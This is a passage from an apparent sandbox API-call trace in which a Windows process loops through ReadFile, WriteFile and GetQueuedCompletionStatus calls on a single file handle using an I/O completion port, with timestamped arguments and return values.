lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.723] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.725] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.726] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.726] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.728] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.729] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.731] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.731] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.749] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.752] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.753] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.753] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.754] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.756] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.757] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.757] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.775] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.777] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.778] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.778] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.780] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.781] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.782] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.782] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.803] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.805] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.806] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.806] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.808] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.809] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.810] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.811] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.828] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.830] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.831] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.831] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.833] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.834] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.836] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.836] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.855] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.857] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.858] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.858] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.860] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.861] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.862] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.863] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.880] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.882] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.883] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.883] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.885] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.886] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.888] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.888] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.909] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.910] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.912] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.912] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.913] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.915] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.916] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.916] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.926] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.927] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.929] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.929] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.930] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.932] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.933] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.933] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.944] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.946] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.985] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.986] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.004] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.005] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.006] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.007] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.024] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.026] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.027] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.027] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.029] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.030] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.031] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.031] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.054] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.055] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.057] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.057] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: 